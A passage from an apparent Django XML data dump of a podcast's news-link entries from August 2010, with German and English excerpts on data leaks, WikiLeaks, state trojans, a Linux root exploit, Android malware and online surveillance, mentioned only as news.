&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Datenleck-bei-Versicherung-Tausende-Kundendaten-im-Netz-1062979.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/20/datenleckbeiversicherungtausendekundendateni.png</field><field type="SlugField" name="slug">datenleckbeiversicherungtausendekundendateni</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-20 20:55:15</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">dataloss insurance</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="10"></object></field></object><object pk="413" model="submitter.newsentry"><field type="CharField" name="title">heise online - Intel kauft McAfee</field><field type="TextField" name="excerpt">Eigentlich nur wegen dem Witz:
Intel CEO: "We need antivirus, can someone buy me McAfee?" Few hours later: "Done." "Great, which version?" "Version ... ?"</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Eigentlich nur wegen dem Witz:
Intel CEO: "We need antivirus, can someone buy me McAfee?" Few hours later: "Done." "Great, which version?" "Version ... ?"
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Intel-kauft-McAfee-1062127.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/20/heiseonline-intelkauftmcafee.png</field><field type="SlugField" name="slug">heiseonline-intelkauftmcafee</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-20 17:36:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">antivirus intel</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="412" model="submitter.newsentry"><field type="CharField" name="title"> Einstieg der Musikindustrie in die US-Debatte zur Netzneutralität : netzpolitik.org</field><field type="TextField" name="excerpt">Weil es zum Thema passt. Musikindustrie in den Staaten kommt mit KiPo und Terroristen...</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Weil es zum Thema passt. Musikindustrie in den Staaten kommt mit KiPo und Terroristen...
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/einstieg-der-musikindustrie-in-die-us-debatte-zur-netzneutralitat/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/20/einstiegdermusikindustrieindieus-debattezu.png</field><field type="SlugField" name="slug">einstiegdermusikindustrieindieus-debattezu</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-20 17:31:57</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">contentmafia netneutrality</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="411" model="submitter.newsentry"><field type="CharField" name="title">Wikipedia verliert seine Autoren: Der Reiz des Anfangs ist verloren - Digitales Denken - Feuilleton - FAZ.NET</field><field type="TextField" name="excerpt">In der englischsprachigen Wikipedia, der weltweit größten Gemeinschaft mit über drei Millionen verfassten Beiträgen, ist von einem ernsthaften Autorenschwund die Rede. Zum ersten Mal in der Geschichte der freien Enzyklopädie werden mehr Beiträge gelöscht als erstellt, berichtet das amerikanische Nachrichtenmagazin „Newsweek"
Deutsche Wikipedia: Der Mitmachwille fällt bei Wikipedia von sechs Prozent aller Nutzer im Vorjahr auf drei Prozent im bisherigen Verlauf dieses Jahres ab.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;In der englischsprachigen Wikipedia, der weltweit größten Gemeinschaft mit über drei Millionen verfassten Beiträgen, ist von einem ernsthaften Autorenschwund die Rede. Zum ersten Mal in der Geschichte der freien Enzyklopädie werden mehr Beiträge gelöscht als erstellt, berichtet das amerikanische Nachrichtenmagazin „Newsweek"
&lt;/p&gt;
&lt;p&gt;Deutsche Wikipedia: Der Mitmachwille fällt bei Wikipedia von sechs Prozent aller Nutzer im Vorjahr auf drei Prozent im bisherigen Verlauf dieses Jahres ab.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.faz.net/s/RubCEB3712D41B64C3094E31BDC1446D18E/Doc~EF725CAAD41704AFD9861AF876270ECFF~ATpl~Ecommon~Scontent.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/20/wikipediaverliertseineautorenderreizdesanf.png</field><field type="SlugField" name="slug">wikipediaverliertseineautorenderreizdesanf</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-20 17:03:12</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">wikipedia</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="7"></object></field></object><object pk="410" model="submitter.newsentry"><field type="CharField" name="title">Rheinland-Pfalz vor Quellen-TKÜ und Online-Durchsuchung</field><field type="TextField" name="excerpt">Quellen-TKÜ und Online Durchsuchung in Rheinland-Pfalz. Als ob es die Ohrfeige vom BVG nie gegeben hätte...</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Quellen-TKÜ und Online Durchsuchung in Rheinland-Pfalz. Als ob es die Ohrfeige vom BVG nie gegeben hätte...
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/security/meldung/Rheinland-Pfalz-vor-Quellen-TKUe-und-Online-Durchsuchung-1062123.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/19/rheinland-pfalzvorquellen-tkuundonline-durchsu____.png</field><field type="SlugField" name="slug">rheinland-pfalzvorquellen-tkuundonline-durchsu</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-19 17:35:44</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">tkü trojan</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="409" model="submitter.newsentry"><field type="CharField" name="title">Medal of Honor ahmt Irak-Video "Collateral Murder" nach</field><field type="TextField" name="excerpt">In den USA ist Medal of Honor bereits vor seiner Veröffentlichung in die Kritik geraten nicht wegen der ästhetischen Nähe zum Wikileaks-Video, sondern weil es Spielern erlaubt, im Mehrspielermodus auch auf Seiten der Taliban zu kämpfen und auf US-Soldaten zu schießen. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;In den USA ist Medal of Honor bereits vor seiner Veröffentlichung in die Kritik geraten nicht wegen der ästhetischen Nähe zum Wikileaks-Video, sondern weil es Spielern erlaubt, im Mehrspielermodus auch auf Seiten der Taliban zu kämpfen und auf US-Soldaten zu schießen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Gamescom-Medal-of-Honor-ahmt-Irak-Video-Collateral-Murder-nach-1061759.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/19/medalofhonorahmtirak-videocollateralmurder.png</field><field type="SlugField" name="slug">medalofhonorahmtirak-videocollateralmurder</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-19 15:29:43</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="408" model="submitter.newsentry"><field type="CharField" name="title">
ThaiLeaks
</field><field type="TextField" name="excerpt">Thailand blocks Wikileaks - thaileaks.info launched. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Thailand blocks Wikileaks - thaileaks.info launched.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://thaileaks.info/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/19/thaileaks.png</field><field type="SlugField" name="slug">thaileaks</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-19 14:56:37</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">thailand wikileaks</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="407" model="submitter.newsentry"><field type="CharField" name="title"> Pirate Party Strikes Hosting Deal With Wikileaks | TorrentFreak </field><field type="TextField" name="excerpt">During his visit to the the Swedish capital Stockholm, Wikileaks spokesman Julian Assange struck a deal with the local Pirate Party. The Party, which participates in the national elections next month, will host several new Wikileaks servers to protect the freedom of the press and help the whistleblower site to carry out its operation.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;During his visit to the the Swedish capital Stockholm, Wikileaks spokesman Julian Assange struck a deal with the local Pirate Party. The Party, which participates in the national elections next month, will host several new Wikileaks servers to protect the freedom of the press and help the whistleblower site to carry out its operation.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://torrentfreak.com/pirate-party-strikes-hosting-deal-with-wikileaks-100817/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/19/piratepartystrikeshostingdealwithwikileak.png</field><field type="SlugField" name="slug">piratepartystrikeshostingdealwithwikileak</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-19 14:45:28</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">pirateparty wikilieaks</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="406" model="submitter.newsentry"><field type="CharField" name="title">Duisburg scheitert an Bloggern - Aufruhr im Netz</field><field type="TextField" name="excerpt">Das es echt noch Leute gibt, die denken, sie könnten Daten aus dem Netz klagen... m(
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Das es echt noch Leute gibt, die denken, sie könnten Daten aus dem Netz klagen... m(
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.sueddeutsche.de/medien/duisburg-scheitert-an-bloggern-aufruhr-im-netz-1.989815</field><field type="FileField" name="page_screenshot">page_shots/2010/08/18/duisburgscheitertanbloggern-aufruhrimnetz___________.png</field><field type="SlugField" name="slug">duisburgscheitertanbloggern-aufruhrimnetz</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-18 22:37:19</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">blog loveparade</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="405" model="submitter.newsentry"><field type="CharField" name="title">Eric Schmidt: nur Namenwechsel wird uns in Zukunft helfen</field><field type="TextField" name="excerpt">Der Google-CEO lässt ja nur noch solche Schoten von sich m)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Der Google-CEO lässt ja nur noch solche Schoten von sich m)
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.telegraph.co.uk/technology/google/7951269/Young-will-have-to-change-names-to-escape-cyber-past-warns-Googles-Eric-Schmidt.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/18/ericschmidtnurnamenwechselwirdunsinzukunft.png</field><field type="SlugField" name="slug">ericschmidtnurnamenwechselwirdunsinzukunft</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-18 22:07:30</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="404" model="submitter.newsentry"><field type="CharField" name="title">Silent Bug Fixing vom Feinsten</field><field type="TextField" name="excerpt">Lokaler root-exploit für Linux wohl schon seit 2.6.0</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Lokaler root-exploit für Linux wohl schon seit 2.6.0
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Root-Rechte-durch-Linux-Kernel-Bug-1061153.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/18/silentbugfixingvomfeinsten.png</field><field type="SlugField" name="slug">silentbugfixingvomfeinsten</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-18 20:52:16</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">exploit linux</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object><object pk="7"></object></field></object><object pk="403" model="submitter.newsentry"><field type="CharField" name="title">Google TV: US-Sender befürchteten dass ihre Sendungen in der Flut der Internet-Inhalte untergehen</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Bericht-Widerstaende-gegen-Google-TV-1061728.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/18/googletvus-senderbefurchtetendassihresendun.png</field><field type="SlugField" name="slug">googletvus-senderbefurchtetendassihresendun</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-18 20:25:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="402" model="submitter.newsentry"><field type="CharField" name="title">Prosecutor: no charges in webcam spy scandal</field><field type="TextField" name="excerpt">Follow up:
Federal authorities announced Tuesday they will not prosecute administrators connected to a webcam spying scandal at a suburban Philadelphia school district.
Prosecutors and the FBI opened an inquiry following a February privacy lawsuit accusing Lower Merion School District officials of spying on students with webcams on the 2,300 district-issued MacBooks. The lawyers who filed the lawsuit claim the district secretly snapped thousands of webcam images of students, including images of youths at home, in bed or even "partially dressed."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Follow up:
&lt;/p&gt;
&lt;p&gt;Federal authorities announced Tuesday they will not prosecute administrators connected to a webcam spying scandal at a suburban Philadelphia school district.
&lt;/p&gt;
&lt;p&gt;Prosecutors and the FBI opened an inquiry following a February privacy lawsuit accusing Lower Merion School District officials of spying on students with webcams on the 2,300 district-issued MacBooks. The lawyers who filed the lawsuit claim the district secretly snapped thousands of webcam images of students, including images of youths at home, in bed or even "partially dressed."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/tech-policy/news/2010/08/prosecutor-no-charges-in-webcam-spy-scandal.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/08/18/prosecutornochargesinwebcamspyscandal.png</field><field type="SlugField" name="slug">prosecutornochargesinwebcamspyscandal</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-18 17:46:20</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">spy webcam</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="401" model="submitter.newsentry"><field type="CharField" name="title">Club Mate zur Löschung in WP vorgeschlagen</field><field type="TextField" name="excerpt">Die WP hat echt einen komplett an der Waffel.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die WP hat echt einen komplett an der Waffel.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://de.wikipedia.org/wiki/Club-Mate</field><field type="FileField" name="page_screenshot">page_shots/2010/08/18/clubmatezurloschunginwpvorgeschlagen.png</field><field type="SlugField" name="slug">clubmatezurloschunginwpvorgeschlagen</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-18 11:56:37</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">mate wikipedia</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="400" model="submitter.newsentry"><field type="CharField" name="title">First smartphone trojan detected</field><field type="TextField" name="excerpt">Not a PoC. Mediaplayer for Android phones sends SMS to premium numbers.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Not a PoC. Mediaplayer for Android phones sends SMS to premium numbers.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.securecomputing.net.au/News/224996,first-smartphone-trojan-detected.aspx</field><field type="FileField" name="page_screenshot">page_shots/2010/08/18/no_page_shot.png</field><field type="SlugField" name="slug">firstsmartphonetrojandetectedsmartphone</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-18 11:00:45</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">android google phone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="399" model="submitter.newsentry"><field type="CharField" name="title"> Scientists hack into cars' computers -- control brakes, engine - CSMonitor.com
</field><field type="TextField" name="excerpt">Break into car board computers via tire sensors [Register](http://www.theregister.co.uk/2010/08/13/car_sensor_wireless_hack/) and maybe soon remotely control the car.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Break into car board computers via tire sensors &lt;a href="http://www.theregister.co.uk/2010/08/13/car_sensor_wireless_hack/"&gt;Register&lt;/a&gt; and maybe soon remotely control the car.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.csmonitor.com/USA/2010/0813/Scientists-hack-into-cars-computers-control-brakes-engine</field><field type="FileField" name="page_screenshot">page_shots/2010/08/18/scientistshackintocarscomputers-co.png</field><field type="SlugField" name="slug">scientistshackintocarscomputers-co</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-18 10:58:40</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">cars, hack, onboard, remote control, wireless</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="398" model="submitter.newsentry"><field type="CharField" name="title">NetworkSolutions Sites Hacked By Wicked Widget &amp;mdash; Krebs on Security</field><field type="TextField" name="excerpt">Network Solutions distributed malware. They do domain parking.
Parked domains are registered but contain no owner content. Network Solutions — like many companies that bundle Web site hosting and domain registration services includes ads and other promotional content on these sites until customers add their own.
Armorize said it traced the problem to the “Small Business Success Index” widget, an application that Network Solutions makes available to site owners through its GrowSmartBusiness.com blog.
Armorize founder and chief executive Wayne Huang said Google and Yahoo! search results indicate anywhere from 500,000 to 5 million Network Solutions domains may have been serving the malware-infected widget. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Network Solutions distributed malware. They do domain parking.
Parked domains are registered but contain no owner content. Network Solutions — like many companies that bundle Web site hosting and domain registration services includes ads and other promotional content on these sites until customers add their own.
&lt;/p&gt;
&lt;p&gt;Armorize said it traced the problem to the “Small Business Success Index” widget, an application that Network Solutions makes available to site owners through its GrowSmartBusiness.com blog.
Armorize founder and chief executive Wayne Huang said Google and Yahoo! search results indicate anywhere from 500,000 to 5 million Network Solutions domains may have been serving the malware-infected widget.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://krebsonsecurity.com/2010/08/networksolutions-sites-hacked-by-wicked-widget/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/18/networksolutionssiteshackedbywickedwidgetmd.png</field><field type="SlugField" name="slug">networksolutionssiteshackedbywickedwidgetmd</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-18 10:55:47</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">malware</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="397" model="submitter.newsentry"><field type="CharField" name="title">Government Uses Social Networking Sites for More than Investigations | Electronic Frontier Foundation</field><field type="TextField" name="excerpt">[Heise:](http://www.heise.de/newsticker/meldung/Polizeibehoerden-forcieren-verdeckte-und-offene-Online-Ermittlungen-1060763.html)
Sie sollen weiteren Aufschluss über Tätigkeiten von US-Sicherheitsbehörden im Netz geben. Dabei geht es etwa um Einzelheiten (PDF-Datei), wie die CIA das 2005 ins Leben gerufene "Open Source Center" nutzt, um aus öffentlich verfügbaren Internetquellen wie Blogs, Chat-Foren oder sozialen Netzwerken gezielt personenbezogene Informationen zu sammeln und auszuwerten. Zugriff auf die dahinter stehende Datenbank und darin eingespeiste Analysen, Videos, Übersetzungen oder Presseübersichten haben demnach rund 15.000 US-Regierungsangestellte von der kommunalen bis hin zur Bundesebene. Die Quellen würden bis Mitte der 1990er Jahre zurückreichen.
Ein anderes Papier (PDF-Datei) zeigt, dass das FBI in E-Mails großes Interesse am "Dark Web Project" der University of Arizona offenbart hat. Dabei geht es um einen Versuch von Computerwissenschaftlern, alle Terrorismus-bezogenen Inhalte aus dem Web systematisch zusammenzutragen und zu analysieren. Gelobt wird an dem Projekt vor allem seine Effizienz, Kommunikationsforen zu durchsuchen und auch die "verborgenen Ecken des Internets" zu erschließen. Es werde sogar an Werkzeugen gearbeitet, um die Erzeuger eigentlich anonymer Online-Informationen zu entschlüsseln. In dem Schreiben von 2007 hält es die US-Polizeibehörde für besonders aufschlussreich, entsprechende Hilfsmittel mit den eigenen Ressourcen zur "Ausnutzung" von Internet-Daten zu verknüpfen. Für die EFF ist das ein weiterer Hinweis darauf, dass US-Ermittler inner- und außerhalb des Strafverfolgungskontextes Unmengen an Daten aus dem Netz durchforsten.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;&lt;a href="http://www.heise.de/newsticker/meldung/Polizeibehoerden-forcieren-verdeckte-und-offene-Online-Ermittlungen-1060763.html"&gt;Heise:&lt;/a&gt;
Sie sollen weiteren Aufschluss über Tätigkeiten von US-Sicherheitsbehörden im Netz geben. Dabei geht es etwa um Einzelheiten (PDF-Datei), wie die CIA das 2005 ins Leben gerufene "Open Source Center" nutzt, um aus öffentlich verfügbaren Internetquellen wie Blogs, Chat-Foren oder sozialen Netzwerken gezielt personenbezogene Informationen zu sammeln und auszuwerten. Zugriff auf die dahinter stehende Datenbank und darin eingespeiste Analysen, Videos, Übersetzungen oder Presseübersichten haben demnach rund 15.000 US-Regierungsangestellte von der kommunalen bis hin zur Bundesebene. Die Quellen würden bis Mitte der 1990er Jahre zurückreichen.
&lt;/p&gt;
&lt;p&gt;Ein anderes Papier (PDF-Datei) zeigt, dass das FBI in E-Mails großes Interesse am "Dark Web Project" der University of Arizona offenbart hat. Dabei geht es um einen Versuch von Computerwissenschaftlern, alle Terrorismus-bezogenen Inhalte aus dem Web systematisch zusammenzutragen und zu analysieren. Gelobt wird an dem Projekt vor allem seine Effizienz, Kommunikationsforen zu durchsuchen und auch die "verborgenen Ecken des Internets" zu erschließen. Es werde sogar an Werkzeugen gearbeitet, um die Erzeuger eigentlich anonymer Online-Informationen zu entschlüsseln. In dem Schreiben von 2007 hält es die US-Polizeibehörde für besonders aufschlussreich, entsprechende Hilfsmittel mit den eigenen Ressourcen zur "Ausnutzung" von Internet-Daten zu verknüpfen. Für die EFF ist das ein weiterer Hinweis darauf, dass US-Ermittler inner- und außerhalb des Strafverfolgungskontextes Unmengen an Daten aus dem Netz durchforsten.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.eff.org/deeplinks/2010/08/government-monitors-much-more-social-networks</field><field type="FileField" name="page_screenshot">page_shots/2010/08/17/governmentusessocialnetworkingsitesformoret.png</field><field type="SlugField" name="slug">governmentusessocialnetworkingsitesformoret</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-17 21:22:01</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">cia eff fbi</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="396" model="submitter.newsentry"><field type="CharField" name="title">Targeted Attack Nets 3,000 Online Banking Customers - DarkReading</field><field type="TextField" name="excerpt">Zeus Trojan erbeutet mit 3000 Kunden über $ 1 Mio. at bank in U.K.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Zeus Trojan erbeutet mit 3000 Kunden über $ 1 Mio. at bank in U.K.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.darkreading.com/smb-security/security/attacks/showArticle.jhtml?articleID=226600381</field><field type="FileField" name="page_screenshot">page_shots/2010/08/17/targetedattacknets3000onlinebankingcustomer.png</field><field type="SlugField" name="slug">targetedattacknets3000onlinebankingcustomer</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-17 20:52:25</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">bank trojan</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="395" model="submitter.newsentry"><field type="CharField" name="title">Germany bans BlackBerrys and iPhones on snooping fears • The Register</field><field type="TextField" name="excerpt">Lieber Minister: Bitte nimm kein Blackberry, iPhone oder (Android haben wir vergessen). Dafür haben wir tolle Phones von T-Systems, die sonst keiner mag.
The German government has advised ministers not to use BlackBerry and iPhone devices due to “a dramatic increase of attacks against” its networks.
A general ban on the use of smartphones in certain German ministries is also being considered, Federal Interior Minister Thomas de Maizière confirmed to the countrys business daily newspaper Handelsblatt yesterday.
He said that ministers and senior civil servants had been told to instead use Simko2 gadgets offered by T-Systems, following advice from the German federal office for information security (BSI).</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Lieber Minister: Bitte nimm kein Blackberry, iPhone oder (Android haben wir vergessen). Dafür haben wir tolle Phones von T-Systems, die sonst keiner mag.
The German government has advised ministers not to use BlackBerry and iPhone devices due to “a dramatic increase of attacks against” its networks.
&lt;/p&gt;
&lt;p&gt;A general ban on the use of smartphones in certain German ministries is also being considered, Federal Interior Minister Thomas de Maizière confirmed to the countrys business daily newspaper Handelsblatt yesterday.
&lt;/p&gt;
&lt;p&gt;He said that ministers and senior civil servants had been told to instead use Simko2 gadgets offered by T-Systems, following advice from the German federal office for information security (BSI).
